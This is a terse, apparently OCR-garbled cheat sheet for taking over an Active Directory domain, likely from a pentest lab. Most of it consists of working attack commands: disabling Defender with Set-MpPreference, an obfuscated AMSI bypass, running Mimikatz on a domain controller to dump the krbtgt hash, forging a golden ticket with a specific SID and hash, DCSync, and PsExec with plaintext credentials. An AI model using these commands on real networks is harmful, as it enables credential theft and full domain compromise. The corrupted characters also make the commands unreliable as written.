Get a Powershell session as a "domain admin" using "Over pass the hash" attack
Create a New-PSSession attaching to the "domain controller"
Enter the new session using Enter-PSSession
Bypass the AMSI
Exit
Load Mimikatz.ps1 on the new session using Invoke-command
Enter the new session using Enter-PSSession again
Now we can execute mimikatz on the DC
Keep note of krbtgt hash
Now go to any "non domain admin" account
Load Mimikats.ps1
Now we can create a ticket using the DC krbtgt hash
Now we can access any service on the DC; Example ls \\dc-corp\C$PsExec64.exe \\test.local - u Domain\user - p Passw0rd! cmd
Set-MpPreference - DisableRealtimeMonitoring $true
Set-MpPreference - DisableIOAVProtection $true sET-ItEM ( ' V' + ' aR' + ' IA' + ' blE:1q2' + ' uZx' TYpE ]( " {1}{O}" -F ' F' , ' rE' 3 ; ( GeT-VariaBle ( " 1Q2U" + " zX" - VaL_s+ )." A`ss`Embly" " GET`TY`Pe" " {6}{3}{1}{4}{2}{@}{5}" -f ' Util' , ' A' , ' Amsi' , ' .Management.' , ' utomation.' , ' s' , ' System' " g`e tf`iE1D" " {O}{2}{1}" -f ' amsi' , ' d' , ' InitFaile' , (" {2}{4}{O}{1}{3}" -f ' Stat' , ' i' , ' NonPubli' , ' c' , ' c,' " sE`T`VaLUE" ${n`ULl} , ${t`RuE} )Execute mimikatz on DC as DA to get krbtgt hash Invoke-Mimikatz - Command ' "lsadump::lsa /patch"' - Computername dcorp- dcCreate a ticket on any machine [ "pass the ticket" attack] Invoke-Mimikatz - Command ' "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-268341927-4156871508-1792461683 /krbtgt:a9b30e5bO0dc865eadcea941le4ade72d /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' List Kerberos services available To use the DCSync feature for getting krbtg hash execute the below command with DA privileges Invoke-Mimikatz - Command ' "lsadump::dcsync /user:dcorp\krbtgt"'